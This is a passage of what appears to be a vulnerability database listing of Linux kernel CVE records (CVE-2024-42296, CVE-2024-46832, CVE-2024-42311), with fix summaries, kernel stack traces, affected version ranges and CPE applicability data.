              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix return value of f2fs_convert_inline_inode()\n\nIf device is readonly, make f2fs_convert_inline_inode()\nreturn EROFS instead of zero, otherwise it may trigger\npanic during writeback of inline inode\u0027s dirty page as\nbelow:\n\n f2fs_write_single_data_page+0xbb6/0x1e90 fs/f2fs/data.c:2888\n f2fs_write_cache_pages fs/f2fs/data.c:3187 [inline]\n __f2fs_write_data_pages fs/f2fs/data.c:3342 [inline]\n f2fs_write_data_pages+0x1efe/0x3a90 fs/f2fs/data.c:3369\n do_writepages+0x359/0x870 mm/page-writeback.c:2634\n filemap_fdatawrite_wbc+0x125/0x180 mm/filemap.c:397\n __filemap_fdatawrite_range mm/filemap.c:430 [inline]\n file_write_and_wait_range+0x1aa/0x290 mm/filemap.c:788\n f2fs_do_sync_file+0x68a/0x1ae0 fs/f2fs/file.c:276\n generic_write_sync include/linux/fs.h:2806 [inline]\n f2fs_file_write_iter+0x7bd/0x24e0 fs/f2fs/file.c:4977\n call_write_iter include/linux/fs.h:2114 [inline]\n new_sync_write fs/read_write.c:497 [inline]\n vfs_write+0xa72/0xc90 fs/read_write.c:590\n ksys_write+0x1a0/0x2c0 fs/read_write.c:643\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:20:02.079Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/70f5ef5f33c333cfb286116fa3af74ac9bc84f1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/47a8ddcdcaccd9b891db4574795e46a33a121ac2"
        },
        {
          "url": "https://git.kernel.org/stable/c/077f0e24b27c4b44841593c7edbd1993be9eecb5"
        },
        {
          "url": "https://git.kernel.org/stable/c/1e7725814361c8c008d131db195cef8274ff26b8"
        },
        {
          "url": "https://git.kernel.org/stable/c/a8eb3de28e7a365690c61161e7a07a4fc7c60bbf"
        }
      ],
      "title": "f2fs: fix return value of f2fs_convert_inline_inode()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42296",
    "datePublished": "2024-08-17T09:09:04.429Z",
    "dateReserved": "2024-07-30T07:40:12.269Z",
    "dateUpdated": "2025-11-03T22:03:55.469Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46832 (GCVE-0-2024-46832)

Vulnerability from cvelistv5 – Published: 2024-09-27 12:39 – Updated: 2026-01-05 10:53

Title

MIPS: cevt-r4k: Don't call get_c0_compare_int if timer irq is installed

Summary

In the Linux kernel, the following vulnerability has been resolved: MIPS: cevt-r4k: Don't call get_c0_compare_int if timer irq is installed This avoids warning: [ 0.118053] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:283 Caused by get_c0_compare_int on secondary CPU. We also skipped saving IRQ number to struct clock_event_device *cd as it's never used by clockevent core, as per comments it's only meant for "non CPU local devices".

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d3ff0f98a52f0aafe…
	https://git.kernel.org/stable/c/e6cd871627abbb459…
	https://git.kernel.org/stable/c/b1d2051373bfc6537…
	https://git.kernel.org/stable/c/32ee0520159f1e8c2…
	https://git.kernel.org/stable/c/189d3ed3b25beee26…
	https://git.kernel.org/stable/c/50f2b98dc83de7809…

Impacted products

Vendor

Product

Version

Linux

Affected: 38760d40ca61b18b2809e9c28df8b3ff9af8a02b , < d3ff0f98a52f0aafe35aa314d1c442f4318be3db (git)
Affected: 38760d40ca61b18b2809e9c28df8b3ff9af8a02b , < e6cd871627abbb459d0ff6521d6bb9cf9d9f7522 (git)
Affected: 38760d40ca61b18b2809e9c28df8b3ff9af8a02b , < b1d2051373bfc65371ce4ac8911ed984d0178c98 (git)
Affected: 38760d40ca61b18b2809e9c28df8b3ff9af8a02b , < 32ee0520159f1e8c2d6597c19690df452c528f30 (git)
Affected: 38760d40ca61b18b2809e9c28df8b3ff9af8a02b , < 189d3ed3b25beee26ffe2abed278208bece13f52 (git)
Affected: 38760d40ca61b18b2809e9c28df8b3ff9af8a02b , < 50f2b98dc83de7809a5c5bf0ccf9af2e75c37c13 (git)

Linux

Affected: 2.6.24
Unaffected: 0 , < 2.6.24 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46832",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:03:39.846521Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:03:44.827Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:19:22.692Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/mips/kernel/cevt-r4k.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d3ff0f98a52f0aafe35aa314d1c442f4318be3db",
              "status": "affected",
              "version": "38760d40ca61b18b2809e9c28df8b3ff9af8a02b",
              "versionType": "git"
            },
            {
              "lessThan": "e6cd871627abbb459d0ff6521d6bb9cf9d9f7522",
              "status": "affected",
              "version": "38760d40ca61b18b2809e9c28df8b3ff9af8a02b",
              "versionType": "git"
            },
            {
              "lessThan": "b1d2051373bfc65371ce4ac8911ed984d0178c98",
              "status": "affected",
              "version": "38760d40ca61b18b2809e9c28df8b3ff9af8a02b",
              "versionType": "git"
            },
            {
              "lessThan": "32ee0520159f1e8c2d6597c19690df452c528f30",
              "status": "affected",
              "version": "38760d40ca61b18b2809e9c28df8b3ff9af8a02b",
              "versionType": "git"
            },
            {
              "lessThan": "189d3ed3b25beee26ffe2abed278208bece13f52",
              "status": "affected",
              "version": "38760d40ca61b18b2809e9c28df8b3ff9af8a02b",
              "versionType": "git"
            },
            {
              "lessThan": "50f2b98dc83de7809a5c5bf0ccf9af2e75c37c13",
              "status": "affected",
              "version": "38760d40ca61b18b2809e9c28df8b3ff9af8a02b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/mips/kernel/cevt-r4k.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.24"
            },
            {
              "lessThan": "2.6.24",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.24",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nMIPS: cevt-r4k: Don\u0027t call get_c0_compare_int if timer irq is installed\n\nThis avoids warning:\n\n[    0.118053] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:283\n\nCaused by get_c0_compare_int on secondary CPU.\n\nWe also skipped saving IRQ number to struct clock_event_device *cd as\nit\u0027s never used by clockevent core, as per comments it\u0027s only meant\nfor \"non CPU local devices\"."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:53:27.342Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d3ff0f98a52f0aafe35aa314d1c442f4318be3db"
        },
        {
          "url": "https://git.kernel.org/stable/c/e6cd871627abbb459d0ff6521d6bb9cf9d9f7522"
        },
        {
          "url": "https://git.kernel.org/stable/c/b1d2051373bfc65371ce4ac8911ed984d0178c98"
        },
        {
          "url": "https://git.kernel.org/stable/c/32ee0520159f1e8c2d6597c19690df452c528f30"
        },
        {
          "url": "https://git.kernel.org/stable/c/189d3ed3b25beee26ffe2abed278208bece13f52"
        },
        {
          "url": "https://git.kernel.org/stable/c/50f2b98dc83de7809a5c5bf0ccf9af2e75c37c13"
        }
      ],
      "title": "MIPS: cevt-r4k: Don\u0027t call get_c0_compare_int if timer irq is installed",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46832",
    "datePublished": "2024-09-27T12:39:29.734Z",
    "dateReserved": "2024-09-11T15:12:18.286Z",
    "dateUpdated": "2026-01-05T10:53:27.342Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42311 (GCVE-0-2024-42311)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:09 – Updated: 2026-01-05 11:37

Title

hfs: fix to initialize fields of hfs_inode_info after hfs_alloc_inode()

Summary

In the Linux kernel, the following vulnerability has been resolved: hfs: fix to initialize fields of hfs_inode_info after hfs_alloc_inode() Syzbot reports uninitialized value access issue as below: loop0: detected capacity change from 0 to 64 ===================================================== BUG: KMSAN: uninit-value in hfs_revalidate_dentry+0x307/0x3f0 fs/hfs/sysdep.c:30 hfs_revalidate_dentry+0x307/0x3f0 fs/hfs/sysdep.c:30 d_revalidate fs/namei.c:862 [inline] lookup_fast+0x89e/0x8e0 fs/namei.c:1649 walk_component fs/namei.c:2001 [inline] link_path_walk+0x817/0x1480 fs/namei.c:2332 path_lookupat+0xd9/0x6f0 fs/namei.c:2485 filename_lookup+0x22e/0x740 fs/namei.c:2515 user_path_at_empty+0x8b/0x390 fs/namei.c:2924 user_path_at include/linux/namei.h:57 [inline] do_mount fs/namespace.c:3689 [inline] __do_sys_mount fs/namespace.c:3898 [inline] __se_sys_mount+0x66b/0x810 fs/namespace.c:3875 __x64_sys_mount+0xe4/0x140 fs/namespace.c:3875 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b BUG: KMSAN: uninit-value in hfs_ext_read_extent fs/hfs/extent.c:196 [inline] BUG: KMSAN: uninit-value in hfs_get_block+0x92d/0x1620 fs/hfs/extent.c:366 hfs_ext_read_extent fs/hfs/extent.c:196 [inline] hfs_get_block+0x92d/0x1620 fs/hfs/extent.c:366 block_read_full_folio+0x4ff/0x11b0 fs/buffer.c:2271 hfs_read_folio+0x55/0x60 fs/hfs/inode.c:39 filemap_read_folio+0x148/0x4f0 mm/filemap.c:2426 do_read_cache_folio+0x7c8/0xd90 mm/filemap.c:3553 do_read_cache_page mm/filemap.c:3595 [inline] read_cache_page+0xfb/0x2f0 mm/filemap.c:3604 read_mapping_page include/linux/pagemap.h:755 [inline] hfs_btree_open+0x928/0x1ae0 fs/hfs/btree.c:78 hfs_mdb_get+0x260c/0x3000 fs/hfs/mdb.c:204 hfs_fill_super+0x1fb1/0x2790 fs/hfs/super.c:406 mount_bdev+0x628/0x920 fs/super.c:1359 hfs_mount+0xcd/0xe0 fs/hfs/super.c:456 legacy_get_tree+0x167/0x2e0 fs/fs_context.c:610 vfs_get_tree+0xdc/0x5d0 fs/super.c:1489 do_new_mount+0x7a9/0x16f0 fs/namespace.c:3145 path_mount+0xf98/0x26a0 fs/namespace.c:3475 do_mount fs/namespace.c:3488 [inline] __do_sys_mount fs/namespace.c:3697 [inline] __se_sys_mount+0x919/0x9e0 fs/namespace.c:3674 __ia32_sys_mount+0x15b/0x1b0 fs/namespace.c:3674 do_syscall_32_irqs_on arch/x86/entry/common.c:112 [inline] __do_fast_syscall_32+0xa2/0x100 arch/x86/entry/common.c:178 do_fast_syscall_32+0x37/0x80 arch/x86/entry/common.c:203 do_SYSENTER_32+0x1f/0x30 arch/x86/entry/common.c:246 entry_SYSENTER_compat_after_hwframe+0x70/0x82 Uninit was created at: __alloc_pages+0x9a6/0xe00 mm/page_alloc.c:4590 __alloc_pages_node include/linux/gfp.h:238 [inline] alloc_pages_node include/linux/gfp.h:261 [inline] alloc_slab_page mm/slub.c:2190 [inline] allocate_slab mm/slub.c:2354 [inline] new_slab+0x2d7/0x1400 mm/slub.c:2407 ___slab_alloc+0x16b5/0x3970 mm/slub.c:3540 __slab_alloc mm/slub.c:3625 [inline] __slab_alloc_node mm/slub.c:3678 [inline] slab_alloc_node mm/slub.c:3850 [inline] kmem_cache_alloc_lru+0x64d/0xb30 mm/slub.c:3879 alloc_inode_sb include/linux/fs.h:3018 [inline] hfs_alloc_inode+0x5a/0xc0 fs/hfs/super.c:165 alloc_inode+0x83/0x440 fs/inode.c:260 new_inode_pseudo fs/inode.c:1005 [inline] new_inode+0x38/0x4f0 fs/inode.c:1031 hfs_new_inode+0x61/0x1010 fs/hfs/inode.c:186 hfs_mkdir+0x54/0x250 fs/hfs/dir.c:228 vfs_mkdir+0x49a/0x700 fs/namei.c:4126 do_mkdirat+0x529/0x810 fs/namei.c:4149 __do_sys_mkdirat fs/namei.c:4164 [inline] __se_sys_mkdirat fs/namei.c:4162 [inline] __x64_sys_mkdirat+0xc8/0x120 fs/namei.c:4162 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b It missed to initialize .tz_secondswest, .cached_start and .cached_blocks fields in struct hfs_inode_info after hfs_alloc_inode(), fix it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f7316b2b2f11cf0c6…
	https://git.kernel.org/stable/c/4a52861cd76e79f1a…
	https://git.kernel.org/stable/c/10f7163bfb5f8b4e0…
	https://git.kernel.org/stable/c/d55aae5c1730d6b70…
	https://git.kernel.org/stable/c/58d83fc160505a700…
	https://git.kernel.org/stable/c/9c4e40b9b731220f9…
	https://git.kernel.org/stable/c/d3493d6f0dfb1ab52…
	https://git.kernel.org/stable/c/26a2ed107929a8551…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f7316b2b2f11cf0c6de917beee8d3de728be24db (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 4a52861cd76e79f1a593beb23d096523eb9732c2 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 10f7163bfb5f8b4e0c9c05a939f20b8540e33c65 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d55aae5c1730d6b70d5d8eaff00113cd34772ea3 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 58d83fc160505a7009c39dec64effaac5129b971 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 9c4e40b9b731220f9464975e49da75496e3865c4 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d3493d6f0dfb1ab5225b62faa77732983f2187a1 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 26a2ed107929a855155429b11e1293b83e6b2a8b (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42311",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:09:58.669472Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:27.119Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:04:27.025Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/hfs/inode.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f7316b2b2f11cf0c6de917beee8d3de728be24db",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "4a52861cd76e79f1a593beb23d096523eb9732c2",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "10f7163bfb5f8b4e0c9c05a939f20b8540e33c65",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "d55aae5c1730d6b70d5d8eaff00113cd34772ea3",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "58d83fc160505a7009c39dec64effaac5129b971",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "9c4e40b9b731220f9464975e49da75496e3865c4",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "d3493d6f0dfb1ab5225b62faa77732983f2187a1",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "26a2ed107929a855155429b11e1293b83e6b2a8b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/hfs/inode.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: fix to initialize fields of hfs_inode_info after hfs_alloc_inode()\n\nSyzbot reports uninitialized value access issue as below:\n\nloop0: detected capacity change from 0 to 64\n=====================================================\nBUG: KMSAN: uninit-value in hfs_revalidate_dentry+0x307/0x3f0 fs/hfs/sysdep.c:30\n hfs_revalidate_dentry+0x307/0x3f0 fs/hfs/sysdep.c:30\n d_revalidate fs/namei.c:862 [inline]\n lookup_fast+0x89e/0x8e0 fs/namei.c:1649\n walk_component fs/namei.c:2001 [inline]\n link_path_walk+0x817/0x1480 fs/namei.c:2332\n path_lookupat+0xd9/0x6f0 fs/namei.c:2485\n filename_lookup+0x22e/0x740 fs/namei.c:2515\n user_path_at_empty+0x8b/0x390 fs/namei.c:2924\n user_path_at include/linux/namei.h:57 [inline]\n do_mount fs/namespace.c:3689 [inline]\n __do_sys_mount fs/namespace.c:3898 [inline]\n __se_sys_mount+0x66b/0x810 fs/namespace.c:3875\n __x64_sys_mount+0xe4/0x140 fs/namespace.c:3875\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nBUG: KMSAN: uninit-value in hfs_ext_read_extent fs/hfs/extent.c:196 [inline]\nBUG: KMSAN: uninit-value in hfs_get_block+0x92d/0x1620 fs/hfs/extent.c:366\n hfs_ext_read_extent fs/hfs/extent.c:196 [inline]\n hfs_get_block+0x92d/0x1620 fs/hfs/extent.c:366\n block_read_full_folio+0x4ff/0x11b0 fs/buffer.c:2271\n hfs_read_folio+0x55/0x60 fs/hfs/inode.c:39\n filemap_read_folio+0x148/0x4f0 mm/filemap.c:2426\n do_read_cache_folio+0x7c8/0xd90 mm/filemap.c:3553\n do_read_cache_page mm/filemap.c:3595 [inline]\n read_cache_page+0xfb/0x2f0 mm/filemap.c:3604\n read_mapping_page include/linux/pagemap.h:755 [inline]\n hfs_btree_open+0x928/0x1ae0 fs/hfs/btree.c:78\n hfs_mdb_get+0x260c/0x3000 fs/hfs/mdb.c:204\n hfs_fill_super+0x1fb1/0x2790 fs/hfs/super.c:406\n mount_bdev+0x628/0x920 fs/super.c:1359\n hfs_mount+0xcd/0xe0 fs/hfs/super.c:456\n legacy_get_tree+0x167/0x2e0 fs/fs_context.c:610\n vfs_get_tree+0xdc/0x5d0 fs/super.c:1489\n do_new_mount+0x7a9/0x16f0 fs/namespace.c:3145\n path_mount+0xf98/0x26a0 fs/namespace.c:3475\n do_mount fs/namespace.c:3488 [inline]\n __do_sys_mount fs/namespace.c:3697 [inline]\n __se_sys_mount+0x919/0x9e0 fs/namespace.c:3674\n __ia32_sys_mount+0x15b/0x1b0 fs/namespace.c:3674\n do_syscall_32_irqs_on arch/x86/entry/common.c:112 [inline]\n __do_fast_syscall_32+0xa2/0x100 arch/x86/entry/common.c:178\n do_fast_syscall_32+0x37/0x80 arch/x86/entry/common.c:203\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/common.c:246\n entry_SYSENTER_compat_after_hwframe+0x70/0x82\n\nUninit was created at:\n __alloc_pages+0x9a6/0xe00 mm/page_alloc.c:4590\n __alloc_pages_node include/linux/gfp.h:238 [inline]\n alloc_pages_node include/linux/gfp.h:261 [inline]\n alloc_slab_page mm/slub.c:2190 [inline]\n allocate_slab mm/slub.c:2354 [inline]\n new_slab+0x2d7/0x1400 mm/slub.c:2407\n 